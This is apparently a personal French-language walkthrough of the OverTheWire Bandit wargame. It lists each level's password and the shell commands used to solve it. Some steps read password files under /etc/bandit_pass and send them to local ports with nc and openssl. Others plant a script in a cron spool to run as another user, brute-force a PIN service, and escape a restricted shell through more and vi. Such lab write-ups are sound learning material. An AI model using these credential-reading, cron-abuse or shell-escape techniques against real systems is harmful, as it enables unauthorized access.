# Bandit

## Mon tmp

Il n'y a pas de dossier tmp que l'on peut utiliser avec n'importe quel user.  
Mon dossier tmp créé avec bandit3 n'est accessible que par bandit3, par exemple.

## Mots de passe

* Bandit 01 : boJ9jbbUNNfktd78OOpsqOltutMc3MY1
* Bandit 02 : CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
* Bandit 03 : UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
* Bandit 04 : pIwrPrtPN36QITSp3EQaw936yaFoFgAB
* Bandit 05 : koReBOKuIDDepwhWk7jZC0RTdopnAYKh
* Bandit 06 : DXjZPULLxYr17uwoI01bNLQbtFemEgo7
* Bandit 07 : HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
* Bandit 08 : cvX2JJa4CFALtqS87jk27qwqGhBM9plV
* Bandit 09 : UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
* Bandit 10 : truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
* Bandit 11 : IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
* Bandit 12 : 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
* Bandit 13 : 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
* Bandit 14 : bandit14_sshkey.private  (ou 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e)
* Bandit 15 : BfMYroe26WYalil77FoDi9qh59eK5xNr
* Bandit 16 : cluFn7wTiGryunymYOu4RcffSxQluehd
* Bandit 17 : bandit17_sshkey.private
* Bandit 18 : kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
* Bandit 19 : IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
* Bandit 20 : GbKksEFF4yrVs6il55v6gwY5aVje5f0j
* Bandit 21 : gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
* Bandit 22 : Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
* Bandit 23 : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
* Bandit 24 : UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
* Bandit 25 : uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
* Bandit 26 : Private RSA key in /home/bandit25

## Explications (pour obtenir le code de ...)

### Bandit 2

Le fichier était nommé `-`, et `cat -` interprète ça comme stdin.  
Il faut donc utiliser `cat ./-` pour contourner le problème.  
https://unix.stackexchange.com/questions/16357/usage-of-dash-in-place-of-a-filename

### Bandit 3

Il faut utiliser `cat "spaces in the filename"` avec des " pour que ça marche.

### Bandit 4

`ls -A`

### Bandit 5

`file inhere/*`  
Fait une liste de tous les fichiers, et leurs types. Il y a un seul fichier en ASCII.

### Bandit 6

`find -size 1003c` pour trouver le fichier avec une taille de 1033 octets.  
A noter que `du inhere/ -a -b` n'aide pas vraiment.

### Bandit 7

`find . 2>/dev/null -size 33c -group bandit6 -user bandit7`  
`2>/dev/null` enlève tous les messages d'erreurs (les écrit vers null, probablement)

### Bandit 8

`grep "millionth" data.txt`

### Bandit 9

`cat data.txt | sort | uniq -u`

### Bandit 10

`strings data.txt`

__NB : Il y a forcément une meilleure solution ! __

### Bandit 11

`base64 -d data.txt`  
Décode un texte encodé en base 64.

### Bandit 12

`cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'`  
On utilise `tr` pour re-traduire la phrase encodée en ROT13.  
cf https://en.wikipedia.org/wiki/ROT13

### Bandit 13

Une combinaison de `xxd -r` , `gzip -d` , `bzip2 -d` et `tar -x -f`  pour décompresser plein de fois le fichier data.txt

### Bandit 14

`ssh -i bandit14_sshkey.private bandit14@bandit.labs.overthewire.org -p 2220`

### Bandit 15

`nc localhost 30000 < /etc/bandit_pass/bandit14`  
Envoie le contenu de /etc/bandit_pass/bandit14 au port 30000 de localhost.  
`nc` est utilisé pour tout ce qui touche aux connextions TCP/UDP.

### Bandit 16

`openssl s_client -ign_eof -connect localhost:30001 < /etc/bandit_pass/bandit15`  
Sans `ign_eof`, on tombe sur "HEARTBEATING"

D'après la page man de s_client:  
> CONNECTED COMMANDS    
>   If a connection is established with an SSL server then any data received from the server is displayed
>   and any key presses will be sent to the server. When used interactively (which means neither -quiet nor
>   -ign_eof have been given), the session will be renegotiated if the line begins with an R, and if the
>   line begins with a Q or if end of file is reached, the connection will be closed down.

### Bandit 17

`nmap localhost -p31000-32000 -sV`  
On repère le service qui est ssl/unknown, car les autres ports ouverts ne font que de l'echo (et certains ne supportent pas ssl)  
`openssl s_client -ign_eof -connect localhost:31790 < /etc/bandit_pass/bandit16`

### Bandit 18

`diff passwords.new passwords.old`

### Bandit 19

`ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat readme'`

En étant connecté en tant que bandit17, j'ai vu le contenu du dossier home de bandit18 (avec un fichier `readme`).
Après ça, il a suffi de ne pas se connecter en interactif car le .bashrc modifié chez bandit18 empêche de faire quoi que ce soit : on est log out direct.
Mais, en lançant une commande directement avec `ssh`, on peut voir le contenu de `readme` et se déconnecter directement.

### Bandit 20

`./bandit20-do id`  
`./bandit20-do cat /etc/bandit_pass/bandit20`

### Bandit 21

Il faut utilsier `tmux` pour pouvoir manipuler 2 terminaux dans la même fenêtre (et donc le même container Docker).  
`tmux` puis `Ctrl+b, c` pour faire une nouvelle fenêtre, `Ctrl+b, 0 1 2 3 ...` (Ou `Ctrl+b, n p`) pour naviguer entre les fenêtres.

`nc -l 1234 < /etc/bandit_pass/bandit20`   
On ouvre un port arbitraire (1234) et on envoie le mot de passe de bandit20 dès qu'une connextion y est établie.  
`./suconnect 1234`    
On n'a ensuite plus qu'à utiliser le fichier binaire donné (suconnect) pour lire cette info envoyée par nc, et l'on reçoit le mot de passe.

Note : Pour laisser la connextion ouverte indéfiniment   
`while true; do nc -l 1234 < /etc/bandit_pass/bandit20; done`

### Bandit 22

`cat /etc/cron.d/cronjob_bandit22`   
On voit que le programme `/usr/bin/cronjob_bandit22.sh` est lancé.  
`less /usr/bin/cronjob_bandit22.sh` nous montre son contenu :   
```bash
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
```
Il suffit de cat ce fichier dans /tmp/ pour avoir le mot de passe.


### Bandit 23

`less /usr/bin/cronjob_bandit23.sh`  
`echo I am user bandit23 | md5sum | cut -d ' ' -f 1`  (le nom du fichier tmp créé)

### Bandit 24

Le cron execute tous les scripts posés dans /var/spool/bandit24/ en tant que bandit24. On peut donc s'en servir pour imprimer le contenu de /etc/bandit_pass/bandit24 quelque part où bandit23 peut lire.

`print_bandit24_pass.sh`
```bash
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit24.pass
```

`cp print_bandit24_pass /var/spool/bandit24/script.sh`  
`cat /tmp/bandit24.pass`


### Bandit 25

Pendant la résolution de 23 -> 24, j'ai par accident cat le contenu de /tmp/result.txt , et le mot de passe de bandit25 était dedans...  
Très certainement le tmp de quelqu'un d'autre. Je comprend pas bien l'infrastructure. Mes dossiers tmp créés pendant un autre puzzle 2h plus tôt sont encore présents quand je me connecte avec un autre utilisateur...

`bruteforce_25.sh`
```bash
#!/bin/bash

i=1
pass=$(cat /etc/bandit_pass/bandit24)

while [ $i -lt 10000 ]; do
    echo "$pass $i" >> list_pass_pin.txt
    let i=i+1
done
```

```shell
chmod +x bruteforce_25.sh
(cat list_pass_pin.txt | nc localhost 30002) >> result.txt
cat result.txt | grep -v "Wrong"
```


### Bandit 26 : The final countdown

Ceci est le dernier niveau de Bandit. Il était plutôt corsé.

On nous dit que bandit26 n'utilise pas `/bin/bash` mais un autre shell. Il faut donc trouver de quel shell il s'agit. Pour cela, on peut regarder dans `/etc/passwd` pour voir quel shell est appelé quand bandit26 se log.  
```
...
bandit24:x:11024:11024:bandit level 24:/home/bandit24:/bin/bash
bandit25:x:11025:11025:bandit level 25:/home/bandit25:/bin/bash
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
...
```

`/usr/bin/showtext` est un script qui lance `more` et exit directement. Il y a cependant une propriété de `more` qui est intéressante : si seulement une partie du texte est affichée,
le programme se met en pause et il y a moyen de lui donner des options, et notamment celle-ci :
```
v                       Start up /usr/bin/vi at current line
```

Il "suffit" donc de rétrécir le terminal pour faire pauser more, lancer vi depuis `more`, et lancer /bin/bash depuis là. On peut lancer le shell avec `:sh`. 
Cependant, le shell lancé est celui de l'environnement, i.e. `/usr/bin/showtext`.

On doit donc dire à vi de lancer /bin/bash. `set shell=/bin/bash` résout le problème. On peut ensuite `:sh` et finir le niveau ! :tada:

